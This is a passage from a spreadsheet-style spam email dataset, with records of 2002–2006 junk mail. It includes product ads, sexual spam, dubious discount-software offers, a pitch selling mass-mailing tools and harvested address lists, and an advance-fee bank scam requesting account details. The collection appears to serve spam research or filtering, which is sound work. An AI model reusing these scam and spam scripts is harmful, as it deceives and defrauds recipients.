\n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>4744</t>
  </si>
  <si>
    <t>To: "yyyy@netnoteinc.com" &lt;yyyy@netnoteinc.com&gt;\nFrom: "Joke-of-the-Day!" &lt;reply-56446664-9@william.monsterjoke.com&gt;\nDate: Thu, 2 May 2002 02:12:07 UT</t>
  </si>
  <si>
    <t>Thu, 2 May 2002 02:12:07 UT</t>
  </si>
  <si>
    <t>"Joke-of-the-Day!" &lt;reply-56446664-9@william.monsterjoke.com&gt;</t>
  </si>
  <si>
    <t>You cannot do that!</t>
  </si>
  <si>
    <t>![]([URL]http://www.vitafactory.com[/URL]  \n  \n* * *\n\n![]([URL]http://www.vitafactory.com[/URL]\n\n* * *\n\n  \n![]([URL]http://www.vitafactory.com[/URL]\n\n* * *\n\n![]([URL]http://www.vitafactory.com[/URL]\n\n* * *\n\n**\n\n  \n**Unsubscribe:**  \nPlease send a blank mail to:  \nunsub-56446664-9@william.monsterjoke.com  \n  \n![]([URL]http://www.vitafactory.com[/URL]\n\n</t>
  </si>
  <si>
    <t>4444</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - Safe Harbor" &lt;sh@insiq.us&gt;\nDate: Thu, 19 Sep 2002 19:17:11 -0400</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 19:17:11 -0400</t>
  </si>
  <si>
    <t>"IQ - Safe Harbor" &lt;sh@insiq.us&gt;</t>
  </si>
  <si>
    <t>5% Guaranteed for Eight Years</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_81109_01C25FF9.832EE820 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Pocket the newest 8 year annuity!	 Pocket the newest 8 year annuity!	  	 ...from Safe Harbor Financial	  	5% Guaranteed for 8 Years (effective yield)	   	8 Year Surrender Period	  	 Please fax back contracts with a copy of your insurance license to 215-564-0155. Click Here to Contract   	  	Issued to Age 90	   	A Rated Company	   	Alternative 10 Year Guaranteed Plan	  Call today for more information!   - or - Please fill out the form below for more information	  Name:	 	  	 Address:	 	  City:	       State:       Zip:  	 Phone:	       Fax:  	 E-mail:	 	   	    	      We don't want anyone to receive our mailings who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL]   Legal Notice   ------=_NextPart_000_81109_01C25FF9.832EE820 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable 5% Guaranteed for Eight Years =20 =20      =20            =20            =20                  5% = Guaranteed for 8 Years (effective = yield) =20                  8 Year Surrender = Period   Please fax back = contracts with                   a copy of your insurance                   license to 215-564-0155. =20                  Issued to Age 90 =20                  A = Rated Company =20                  Alternative 10 Year Guaranteed Plan Call today for more = information!             - or - =20                  =20                      =20                         Please fill out = the form below for more information =20                         Name: =20                         Address: =20                         City:  =20                                                           State:=20                                                           Zip:=20                            =20                         Phone: =20                                                           Fax:=20                            =20                         E-mail: =20                                         =20      We don't = want anyone to receive our mailings who does not=20 			wish to receive them. This is a professional communication=20 			sent to insurance professionals. To be removed from this mailing=20 			list, DO NOT REPLY to this message. Instead, go here: =20 			[URL]http://www.insuranceiq.com[/URL] Legal Notice =20 ------=_NextPart_000_81109_01C25FF9.832EE820--</t>
  </si>
  <si>
    <t>4451</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "SE Systems Ltd" &lt;info@sesystems.co.uk&gt;\nDate: Thu, 19 Sep 2002 18:24:11 +0100</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 18:24:11 +0100</t>
  </si>
  <si>
    <t>"SE Systems Ltd" &lt;info@sesystems.co.uk&gt;</t>
  </si>
  <si>
    <t>Lease Deal</t>
  </si>
  <si>
    <t>|  |\n\nLeasing Deal of the Year  \nMercedes-Benz E240 (2.6) Elegance Auto  \n  \n---  \n  \n![]([URL]http://www.mercedes.co.uk[/URL]  \n\n\nSpecification includes: Automatic, Metallic Paint, Alloy Wheels, Electric\nWindows, Remote Central Locking, Electric Folding Mirrors, Trip computer, Air\nConditioning, Headlamp Wash, Rear Head Restraints, Tinted Windows and Wood\nTrim\n\n 299.00 per month 2 years (3+23)  \n276.70 per month **** 3 years (3+35)\n\n**Used 2001 Registered 01 Y &amp;  01 51 plates (sub12,000miles)  \n** 10,000 miles per year, PCP, PCH, Contract Purchase and Finance Lease are\nalso available on request\n\n|\n\n  \n  \n**Telephone: 01702 530174**     **Fax: 01702 530200** |\n![]([URL]http://www.sesystems.co.uk[/URL]\nsales@sesystems.co.uk\n\n</t>
  </si>
  <si>
    <t>http://www.mercedes.co.uk http://www.sesystems.co.uk</t>
  </si>
  <si>
    <t>4443</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Shannon &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Thu, 19 Sep 2002 17:00:05 -0500</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 17:00:05 -0500</t>
  </si>
  <si>
    <t>Shipment Status</t>
  </si>
  <si>
    <t>![]([URL]http://admanmail.com[/URL]  \n---  \n|\n\n# Congratulations JM@NETNOTEINC.COM!\n\nDear JM@NETNOTEINC.COM,\n\nYou've been selected to receive a bottle of Liz Claiborne® fragrance -\n**FREE***.\n\nPerfect to wear for any occassion, Liz Claiborne® is a light floral fragrance\nwith just a hint of fresh citrus and mandarin - you'll love it for the Fall\nSeason!  Click here now and we'll send this refreshing scent right out to you.\n\nWith only a few bottles on hand, I know they won't last long. Guarantee your\nown good fortune - and click here to claim your very own bottle of Liz\nClaiborne® fragrance.\n\nJM@NETNOTEINC.COM act now and click here for a one time only chance!\n\nSincerely,  \n![]([URL]http://admanmail.com[/URL]  \nShannon Jones\n\nP.S. Please feel free to forward this great offer to a friend!  \n---  \n![]([URL]http://admanmail.com[/URL]  \n  \n**Special $1 Store on Thank-youGift** has great products at an amazing price.\nGuaranteed first quality 100%. Satisfaction guaranteed or your money back.\nVisit Thank-youGift to get in on all the bargains.  \n---  \n  \nVisit Milesource.com - Get miles for just being online! A **completely FREE**\n, no obligation program that rewards members for doing the things you already\ndo. **Get FREE movie tickets, FREE videos, FREE gifts, even FREE airline\ntickets** just for researching, reading the news, catching up on sports and\nshopping, even playing games! Visit Milesource.com NOW!\n\n*All offers are based on 100% customer satisfaction. Yourfreepresent reserves the right to cancel this offer any time once quantities run out. A handling charge of $5.93 will be applied to each item. All merchandise and offers are based on first come first serve. Offer not valid in the state of California and Washington.  \n![T]([URL]http://admanmail.com[/URL]\n\n* * *\n\nYou are receiving this mailing because you are a member of SendGreatOffers.com\nand subscribed as:JM@NETNOTEINC.COM To unsubscribe  Click Here\n([URL]http://admanmail.com[/URL];=SGO) or reply\nto this email with REMOVE in the subject line - you must also include the body\nof this message to be unsubscribed. Any correspondence about the\nproducts/services should be directed to the company in the ad.\n%EM%JM@NETNOTEINC.COM%/EM%  \n\n</t>
  </si>
  <si>
    <t>4441</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: Special_Offer@FrugalJoe.com\nDate: Thu, 19 Sep 2002 16:28:25 -0400</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 16:28:25 -0400</t>
  </si>
  <si>
    <t>Special_Offer@FrugalJoe.com</t>
  </si>
  <si>
    <t>Unleash your PC's Multimedia POWER at 70% off retail!</t>
  </si>
  <si>
    <t>![]([URL]http://www.frugaljoe.com[/URL] |\n![]([URL]http://www.salealerts.com[/URL] | _** Never Pay Retail!**  \n_![]([URL]http://www.salealerts.com[/URL]  \n---|---|---  \n![]([URL]http://www.salealerts.com[/URL]  \n  \n|  |\n\n|\n\n**Unleash your PC's Multimedia power TODAY!  \n**  \n  \n---  \n![]([URL]http://promote.thankugift.com[/URL] |\n![]([URL]http://promote.thankugift.com[/URL] |\n![]([URL]http://promote.thankugift.com[/URL]![]([URL]http://promote.thankugift.com[/URL]\n| ![]([URL]http://promote.thankugift.com[/URL]  \n![]([URL]http://promote.thankugift.com[/URL] |\n![]([URL]http://promote.thankugift.com[/URL]  \n![]([URL]http://promote.thankugift.com[/URL] |\n![]([URL]http://promote.thankugift.com[/URL]![]([URL]http://promote.thankugift.com[/URL]  \n![]([URL]http://promote.thankugift.com[/URL]![]([URL]http://promote.thankugift.com[/URL]  \n![]([URL]http://promote.thankugift.com[/URL]  \n  \n|  | **Compare and Save**  \n---  \n  |\n\n**Price**\n\n|\n\n**S &amp;H**\n\n|\n\n**Total**\n\n|\n\n**You Save**\n\n|\n\n**See for yourself**  \n  \n**AMAZON**\n\n|\n\n$29.99\n\n|\n\n$4.99\n\n|\n\n$34.98\n\n|\n\n**70%**\n\n|\n\nClick here  \n  \n**CDW**\n\n|\n\n$29.21\n\n|\n\n$7.53\n\n|\n\n$36.74\n\n|\n\n**69%**\n\n|\n\nClick here  \n  \n**Office Depot**\n\n|\n\n$28.99\n\n|\n\n$5.95\n\n|\n\n$34.94\n\n|\n\n**69%**\n\n|\n\nClick here  \n  \n**Office Max**\n\n|\n\n$29.99\n\n|\n\n$3.99\n\n|\n\n$33.98\n\n|\n\n**70%**\n\n|\n\nClick here  \n  \n*** Comparisons are based on similar model from leading merchants.**  \n*Microsoft Windows® approved and certified compatible with all major voice recognition software.   |  | \n\n| **Unleash your PC's Multimedia power TODAY** with **** the **LABTEC**\nPATENTED **NCAT2** noise cancelling-amplification technology!  \n  \nUse your PC for long distance calls and **SAVE BIG!** Activate your PC and all\nyour programs **USING YOUR VOICE**!  \n  \n**Video Conference** with your friends IN REAL TIME! Send **VOICE EMAIL** or\nChat worldwide over the Internet, **LIVE!** \- even record your voice &amp;\nconversations **LIKE THE PRO'S**.\n\nThis is _THE_ best headset for your PC by the undisputed industry leader,\n**LABTEC** \- Producing unmatched sound quality, superior to any headset\nyou've ever owned! The ultimate in style and quality. Get yours today while\nthey last! FAQ's  \n---  \n  \n  \n\n**You can't get a better Headset \-- at a better price -- anywhere else!**  \nYou pay only: **$8.99  \n**![]([URL]http://promote.thankugift.com[/URL]  \n  \n---  \n  |  \n![](dot.gif)  \n---  \n![]([URL]http://www.frugaljoe.com[/URL] |\n![]([URL]http://www.salealerts.com[/URL] | __  \nYou have received this email because you have subscribed through one of our\nmarketing partners. If you would like to learn more about Frugaljoe.com then\nplease visit our website [URL]www.frugaljoe.com[/URL] If this message was sent to you in\nerror, or if you would like to unsubscribe please clickhere or cut and paste\nthe following link into a web browser:  \n[URL]http://www.frugaljoe.com[/URL]\~moc.cnietonten^^mj\~1754388\~12a1  \n  \n![]([URL]http://www.salealerts.com[/URL]  \n  \n![]([URL]http://www.330w.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.frugaljoe.com http://www.salealerts.com http://www.salealerts.com http://www.salealerts.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://promote.thankugift.com http://www.frugaljoe.com http://www.salealerts.com www.frugaljoe.com http://www.frugaljoe.com http://www.salealerts.com http://www.330w.com</t>
  </si>
  <si>
    <t>4440</t>
  </si>
  <si>
    <t>To: Social@linux.ie\nFrom: "You$25 GiftCard" &lt;prizemama@reply2.azoogle.com&gt;\nDate: Thu, 19 Sep 2002 16:21:48 GMT</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 16:21:48 GMT</t>
  </si>
  <si>
    <t>"You$25 GiftCard" &lt;prizemama@reply2.azoogle.com&gt;</t>
  </si>
  <si>
    <t>[ILUG-Social] Claim Your $25 Kmart Gift Card</t>
  </si>
  <si>
    <t>1) Claim Your $25 Kmart Gift Card\n[URL]http://www.adclick.ws[/URL]\n\n2) Auto Loans, Fast Approvals for Any Credit!\n[URL]http://www.adclick.ws[/URL]\n\n3) Are You Paying Too Much for Auto Insurance - Find Out?\n[URL]http://www.adclick.ws[/URL]\n\nHave a Wonderful Day,\nPrizeMama.com\n\n\n\n\n\n\n\n\n\n------------------\nYou are receiving this email because you have opted-in to receive\nemail from publisher: prizemama.  To unsubscribe, click below:\n\n[URL]http://u2.azoogle.com[/URL]\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.adclick.ws http://www.adclick.ws http://www.adclick.ws http://u2.azoogle.com http://www.linux.ie</t>
  </si>
  <si>
    <t>4438</t>
  </si>
  <si>
    <t>To: &lt;humoka@msn.com&gt;, &lt;humbert@greenwood.net&gt;, &lt;ilug@linux.ie&gt;,\nFrom: carol_dip@hotmail.com\nDate: Thu, 19 Sep 2002 10:38:16 -1600</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 10:38:16 -1600</t>
  </si>
  <si>
    <t>carol_dip@hotmail.com</t>
  </si>
  <si>
    <t>&lt;humoka@msn.com&gt;, &lt;humbert@greenwood.net&gt;, &lt;ilug@linux.ie&gt;,</t>
  </si>
  <si>
    <t>[ILUG] Re: This is NO JOKE! Speed up your CPU for under $30!</t>
  </si>
  <si>
    <t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   Take Control of Your Computer With This Top-of-the-Line Software!  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++                                  Symantec SystemWorks 2002                            -=Professional Software Suite=- This Special Package Includes Six - Yes 6! - Feature-Packed Utilities ALL for 1 Special LOW Price of Only $29.99! This Software Will:  - Protect your computer from unwanted and hazardous viruses  - Help secure your private &amp; valuable information  - Allow you to transfer files and send e-mails safely  - Backup your ALL your data quick and easily  - Improve your PC's performance w/superior integral diagnostics!  - ***** You'll NEVER have to take your PC to the repair shop AGAIN! *****         That's SIX, yes, -6- Feature-Packed Utilities @ 1 Great Price!!!     A $300+ Combined Retail Value YOURS Only $29.99! (Limited Time Offer)                       &lt; Price Includes FREE Shipping! &gt;          Why SO Cheap you ask? You are buying ONLINE WHOLESALE,                   Direct from the Warehouse TO YOU!                                           ~~~ AND ~~~          FOR A LIMITED TIME BUY 2 OF ANY SOFTWARE &amp; GET 1 FREE!!!!                                  Don't fall prey to destructive viruses or programs!           Protect your computer and your valuable information and...           ...CLICK HERE TO ORDER NOW! -&gt; [URL]http://61.151.247.39[/URL]              OR cut &amp; paste the above link  ^^^^^^^^^^^^^^^^  in your browser's URL bar.           FOR MORE QUESTIONS, OR TO ORDER CALL US TOLL-FREE ANYTIME!                                                   1 - 8 0 0 - 8 6 1 - 1 4 8 1 We are strongly against sending unsolicited emails to those who do not wish to receive our special mailings. You have opted-in to one or more of our affiliate sites requesting to be notified of any special offers we may run from time to time. We also have attained the services of an independent 3rd party to overlook list management and removal services. The list CODE in which you are registered is marked at the bottom of this email. If you do not wish to receive further mailings,  Please click here -&gt; [URL]http://61.151.247.39[/URL] to be removed from the list.   Please accept our apologies if you have been sent this email in error. We honor all removal requests.  IAES (International Association of Email Security) Approved List. Serial # 9e45tYu2-ssI3USA --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://61.151.247.39 http://61.151.247.39 http://www.linux.ie</t>
  </si>
  <si>
    <t>4436</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: Slim Factors &lt;slim@zenmarketing.net&gt;\nDate: Thu, 19 Sep 2002 10:15:08 -0400</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 10:15:08 -0400</t>
  </si>
  <si>
    <t>Slim Factors &lt;slim@zenmarketing.net&gt;</t>
  </si>
  <si>
    <t>Slim Factors - A totally new approach to weight loss</t>
  </si>
  <si>
    <t>![]([URL]http://global.zenmarketing.net[/URL]  \n---  \n![]([URL]http://global.zenmarketing.net[/URL] |\n![]([URL]http://global.zenmarketing.net[/URL] |\n![]([URL]http://global.zenmarketing.net[/URL]  \n![]([URL]http://global.zenmarketing.net[/URL] | ![Buy Slim Factors\nNow]([URL]http://global.zenmarketing.net[/URL]  \n  \nThis e-mail is intended to be a benefit to the recipient. If you would like to\nopt-out and not receive any more click here. Your address will be removed\nimmediately. We sincerely apologize for any inconvenience. This E-mail is not\nSPAM under the Federal Regulatory laws of the United States. This message is\nbeing sent to you in compliance with the proposed Federal Legislation for\ncommercial e-mail (H.R.4176-SECTION 101 PARAGRAPH (e) (1) (A)) and Bill s.1618\nTITLE III passed by the 105th US Congress. This message is not intended for\nresidents of WA, NV, CA, VA. Screening of addresses has been done to the best\nof our technical ability.\n\n</t>
  </si>
  <si>
    <t>http://global.zenmarketing.net http://global.zenmarketing.net http://global.zenmarketing.net http://global.zenmarketing.net http://global.zenmarketing.net http://global.zenmarketing.net</t>
  </si>
  <si>
    <t>4434</t>
  </si>
  <si>
    <t>To: &lt;C:`Bulk.AdzNortonNorton.txt@webnote.net&gt;\nFrom: "don" &lt;apf@wu-wien.ac.at&gt;\nDate: Thu, 19 Sep 2002 05:20:18 -0500</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 05:20:18 -0500</t>
  </si>
  <si>
    <t>"don" &lt;apf@wu-wien.ac.at&gt;</t>
  </si>
  <si>
    <t>&lt;C:`Bulk.AdzNortonNorton.txt@webnote.net&gt;</t>
  </si>
  <si>
    <t>PROTECT YOUR INFORMATION AND YOUR COMPUTER</t>
  </si>
  <si>
    <t>ATTENTION: This is a MUST for ALL Computer Users!!! *NEW-Special Package Deal!* Norton SystemWorks 2002 Software Suite -Professional Edition- Includes Six - Yes 6! - Feature-Packed Utilities ALL For 1 Special LOW Price! This Software Will: - Protect your computer from unwanted and hazardous viruses - Help secure your private &amp; valuable information - Allow you to transfer files and send e-mails safely - Backup your ALL your data quick and easily - Improve your PC's performance w/superior integral diagnostics! 6 Feature-Packed Utilities...1 Great Price! A $300+ Combined Retail Value! YOURS for Only $29.99!   Don't fall prey to destructive viruses or hackers! Protect  your computer and your valuable information! So don't delay...get your copy TODAY! [URL]http://euro.specialdiscounts4u.com[/URL] ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ This email has been screened and filtered by our in house ""OPT-OUT"" system in  compliance with state laws. If you wish to "OPT-OUT" from this mailing as well  as the lists of thousands  of other email providers please visit   [URL]http://dvd.specialdiscounts4u.com[/URL] ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</t>
  </si>
  <si>
    <t>http://euro.specialdiscounts4u.com http://dvd.specialdiscounts4u.com</t>
  </si>
  <si>
    <t>4464</t>
  </si>
  <si>
    <t>To: &lt;webmaster@egraffiti.zzn.com&gt;\nFrom: "Mrs. W" &lt;107664.1420@actionsports.co.uk&gt;\nDate: Thu, 19 Sep 2002 02:29:10 -1600</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 02:29:10 -1600</t>
  </si>
  <si>
    <t>"Mrs. W" &lt;107664.1420@actionsports.co.uk&gt;</t>
  </si>
  <si>
    <t>&lt;webmaster@egraffiti.zzn.com&gt;</t>
  </si>
  <si>
    <t>Not too old to put out!                   26792</t>
  </si>
  <si>
    <t>WET, HORNY AND DIRTY GRANDMAS!\n\nRemember how you lusted after your friend's mum in high\nschool? She was 46 and you were 15? Remember the time\nwhen she bent over to do her gardening and you saw her\nsagging breasts through the v-neck opening of her summer\ndress? She was OLD and you LOVED her! All you wanted to\ndo was FUK that Dirty Old Mole BLUE! You can now! Follow\nthe link below to see just how OLD &amp; DIRTY these moles are!\n[URL]http://62.16.101.30[/URL]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nRemove here:\n[URL]http://62.16.101.30[/URL]</t>
  </si>
  <si>
    <t>http://62.16.101.30 http://62.16.101.30</t>
  </si>
  <si>
    <t>4433</t>
  </si>
  <si>
    <t>To: &lt;webmaster@efi.ie&gt;\nFrom: &lt;calebn@msn.com&gt;\nDate: Thu, 19 Sep 2002 01:15:03 +1100</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 01:15:03 +1100</t>
  </si>
  <si>
    <t>&lt;calebn@msn.com&gt;</t>
  </si>
  <si>
    <t>Hi,\n\nI'm a college dropout.  I work about two hours a day.  \nI'm ambitious, but extremely lazy, and I make over \n$250,000 a year.  Are you curious yet?\n\nIn a minute I'm going to tell you my secret,\nit's the dirty little secret of the Internet ...\n\nYou've probably heard stories about people making\nwhopping huge money online, but you thought they \nwere the big corporate execs, famous programmers, or\nboy-geniuses.\n\nWell, grasshopper, think again ...\n\nIt's people like you and me that are making the real\nmoney.  Yep, people like YOU AND ME!\n\nEver since the "dot com bubble" burst in 1999, small-time\nentrepreneurs are getting richer while the Fortune 500 \ncompanies look for bankruptcy lawyers.\n\nToday small business owners and ordinary folks \nlike you and me can use the web to achieve complete \nfinancial freedom with NO INVESTMENT and very little \nwork.  How?  By learning the most profitable marketing \ntechnique ever created - it's called BULK EMAIL.\n\nIf you've ever recieved an email advertisement, then \nyou know what bulk email is.  I bet you can't click on \nDELETE fast enough for most of those ads, right?\nYou might not want their product, but remember that \nthousands of other folks probably do.  Bulk email is a \npercentage game - every bulker who contacts you \nmakes a six figure income on the Internet.  I \nguarantee it.  Now let's go back to Math 101 and \nreview some numbers ...\n\nIf you sell on eBay, you pay anywhere from a few\ndollars to over a hundred dollars just to post one\nauction.  How many people see your ad?  Maybe a\ncouple thousand or even ten or twenty thousand\nover a period of days.  Using bulk email, YOU CAN\nSEND YOUR AD TO MORE THAN A MILLION PEOPLE A DAY\nat virtually no cost.  Whether your send 100,000\nemails or 100 million emails, the price is the same.\nZERO!\n\nStop paying those outrageous auction listing fees when\nhardly anyone sees your ad!\n\nImagine that you have a decent product with a \nprofit margin of $20.00 on each sale.  If you send \nan email ad to 500,000 people, and only one person \nin a thousand actually places an order, then you just \ngenerated 500 orders and made $10,000 in a few hours \nof work.  \n\nIt's that simple ...\n\nAll you have to do is convince ONE PERSON OUT OF A\nTHOUSAND to buy your stuff and you're FILTHY RICH.\n\nThe best thing is that anyone can do it.  Doesn't \nmatter if you're a nineteen-year-old college student \nusing a dorm-room computer or a fifty-year-old \nexecutive working from an office building in New \nYork City.  Anyone, and I repeat ANYONE, can start \nbulk emailing with virtually no startup costs.  All \nit takes is a  few days of study, plenty of ambition, \nand some basic familiarity with the Internet.\n\nI quit college when I was 19 to capitalize on the \n"Dot Com" mania, and I've never looked back.  I \nstarted with no money, no product to sell, and only \nthe most rudimentary computer skills.  I saw an \nopportunity and I seized it.  A few years later, \nI bought my own home - with CASH.  \n\nYou don't need any money.  You don't need a product.\nYou don't need to be a computer nerd and no experience\nwhatsoever is required.  \n\nIf you saw an employment ad in the newspaper like that\nyou'd jump right on it.  It would be a dream come true.\nSo what are you waiting for?!\n\nI'm going to ask you four simple questions.  If you answer\nYES to all of them, then I can almost promise that you\nwill make at least $100,000 using bulk email this year.\n\nHere goes ...\n\nDo you have basic experience with the web? \nDo you have a computer and an Internet connection?\nDo you have a few hours each day of free time?  \nDo you want to earn some extra money with an eye towards \ncomplete financial freedom?  \n\nIf you answer YES to these questions, you could be\nmaking $5,000 - $20,000 per week working from your \nhome.  Kiss your day job goodbye - this sure beats \nthe 9-5 daily grind!\n\nAll you need is ambition and commitment.  This\nis no "get rich quick scheme".  You have to work\nto make big bucks, but ANYONE - and I mean ANYONE - can do \nit.\n\nYou're probably wondering if it's hard to get started.  \nDon't worry, it's not! I will show you step-by-step \nhow to start your first email campaign and how to\nbuild a booming online business.  You'll be generating \norders - AND MAKING MONEY - in less than seven days.\n\nOkay, so what if you don't have anything to sell?\n\nNo problem!!  I'll show you where to find hot\nproducts that sell like CRAAAAAAZY! Most people delay\nstarting an Internet business because they have \nnothing to sell, but I'm removing that hurdle right now.  \nAfter reading the Bulkbook, you can build your complete \nproduct line in less than two hours!  There is NO EXCUSE \nnot to get started! I will get you up-and-running within \nseven days. In fact ...\n\nI personally guarantee that you will start your own \nbulk email campaign less than a week after reading \nthe Bulkbook!  I'll give you a toll-free phone number \nto reach me 24 hours a day, seven days a week; \nwhere else will you find that level of service?!\n\nI will also include a step-by-step guide to starting \nyour very first email campaign called "Seven Days to \nBulk Email Success".  This seperate guide contains a daily \nroutine for you to follow with specific, exact \ninstructions on how to get started.  On day one, for \nexample, I teach you where to find a product to sell. \nThe next day you learn how to build a fresh mailing \nlist.  On the seventh day, you just click send!  Your \nvery first campaign is ready to go.\n\nAs a special bonus, you'll recieve a FREE copy \nof our STEALTH MASS MAILER, a very powerful bulk \nemail program which retails for $49.99! I'll even\ninclude 7 million email addresses absolutely FREE\nif you order NOW!\n\nStop wasting your money on auction listing fees, \nclassifieds, and banner ads - they don't work, and \nnever will!  If you are SERIOUS about making money \non the Internet, bulk email is your only option.  \nWhat are you waiting for?  Few of us are willing \nto share this knowledge, but I promise to teach \nyou everything I know about bulk emailing in this \nextraordinary bulk emailer's handbook ... The Bulkbook! \n\nOnce again, here's the deal.  You give me $29.99.  \nI give you ALL THE TOOLS YOU NEED to become a\nsuccessful, high profit bulk emailer.  INCLUDING:\n\n** THE BULKBOOK\nTeaches you step-by-step how to become a high profit\nbulk emailer.  Secret techniques and tips never\nbefore revealed.\n\n** SEVEN DAYS TO BULK EMAIL SUCCESS\nProvides detailed day-by-day instruction to start sending\nyour first email campaign in seven days.\n\n** 600 Email subjects that PULL LIKE CRAZY\n\n** EMAIL LIST MANAGER\nManage your email lists quickly and easily.  Very \nuser-friendly, yet powerful, software.\n\n** STEALTH MASS MAILER\nSoftware can send up to 50,000 emails an hour automatically.\nJust load them in there and click SEND!\n\n** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT\nExtracts email addresses from databases and search engines\nat speeds of over 200,000 per hour.\n\n** WORLDCAST EMAIL VERIFIER\nUsed to verify your email addresses that you extract to \nmake sure they're valid.\n\n** EBOOK PUBLISHER\nEasily publish your own e-books and reports for resale using,\nyou guessed it, bulk email!\n\n** SEVEN MILLION EMAIL ADDRESSES\nThis huge list will get you started bulking right away.\nI harvested these addresses myself, the list is filled\nwith IMPULSE BUYERS ready to respond to your ads!\n\nIf you added up all of the FULL VERSION BULK EMAIL software\nincluded with the BULKBOOK package, it would total over\n$499.  I am giving you the whole bundle for only $29.99.\nThat means there is no other out-of-pocket startup expense\nfor you.  Nothing else to buy, no reason to waste money on\nsoftware that doesn't work.  With this one package, you get \nEVERYTHING YOU NEED to START BULK EMAILING RIGHT AWAY.  \n\nAre you willing to invest $29.99 for the opportunity\nto make a SIX FIGURE INCOME on the Internet with no \nstartup cash and very little effort?\n\nRemember, you will recieve a toll-free phone number\nfor 24 hour expert advice and consultation FROM ME\nPERSONALLY.\n\nTo order the Bulkbook right now for only $29.99 with \na Visa or Mastercard, please click on the link below. \nThis will take you to our secure server for order \nprocessing:\n\n[URL]http://cbphost.net[/URL]\n\nNote: The Bulkbook will be delivered electronically\nwithin 24 hours. It is not available in printed form. \n\n***********************************************************\nOur company is strictly opposed to unsolicited email.\nTo be removed from this opt-in list, please send a \nrequest to "bulkexpert@yahoo.com"\n***********************************************************\n5906UuMo0-083oXzI3821cAvh4-032miqQ2111Hkix2-485El45</t>
  </si>
  <si>
    <t>http://cbphost.net</t>
  </si>
  <si>
    <t>2626</t>
  </si>
  <si>
    <t>To: nan\nFrom: Alpha Kone &lt;alph_akon5@hotmail.com&gt;\nDate: Thu, 19 Oct 2006 17:43:55 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2006 17:43:55 +0000</t>
  </si>
  <si>
    <t>Alpha Kone &lt;alph_akon5@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Mr Alpha Kone,TREAT VERY URGENT AND CONFIDENTIAL.</t>
  </si>
  <si>
    <t>CDear Friend,\n\nI apologize if the contents in this mail are contrary to your moral ethics, \nwhich I feel may be of great disturbance to your personal life, But please \ntreat with absolute secrecy and personal. I pray that this email reaches you \nin the best of health.\n\nMr Alpha Kone the manager of bill and  exchange at the foreign remittance \ndepartment Bank Of Africa. In my  department we discoveredan  abandoned sum \nof US$14.5M (fourteen million five  hundred thousand US dollars) in an \naccount that belongs to one of our  foreign customer who died along with his \nfamily in the 2000 in a plane crash.\n\nSince we got information about his death, we have  been expecting his next \nof  kin to come over and claim his money because we cannot release it unless \n  some body applies for it as next of kin or relation  to the deceased as  \nindicated in our banking guide lines and lawsbut  unfortunately we learnt \nthat all his supposed next of kin or relation died  alongside with him at \nthe plane crash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I now  decided to make this \nbusiness  proposal to you and release the money to you as the next of kin or \nrelation  to the deceased for safety and subsequent disbursement since \nnobody is  coming for it and we don't want this  money to  go  into the bank \ntreasury as   unclaimed bill.\n\nThe banking law and guidelines here stipulates that  if such money remained \nunclaimed after six years, the money will be transferred into the bank  \ntreasury as unclaimed fund.\n\nThe request of foreigner  as next of kin in this  business is occasioned by\nthe fact that the customer  was a foreigner and a Burkina cannot stand as \nnext of kin to a foreigner. I agree that 45% of this money will be for you \nas  respect to the provision of a foreign account , 5% will be set aside for \nexpenses incurred during the  business and 50% be for me.\n\nThereafter, I will visit your country for disbursement according to the \npercentage indicated. Therefore, to enable the immediate transfer of this  \nfund to you as arranged, you must apply first to the  bank as relation or  \nnext of kin of the deceased indicating your bank name, your bank account  \nnumber, your private telephone and fax number for easy and effective\ncommunication and location where the money will be  transfer.\n\nUpon receipt of your reply, I will send to you by  fax or email the text of \nthe application. I will not fail to bring to your  notice that this \ntransaction is hitch-free and that you should not entertain any atom of fear \nas all required arrangements have been made for 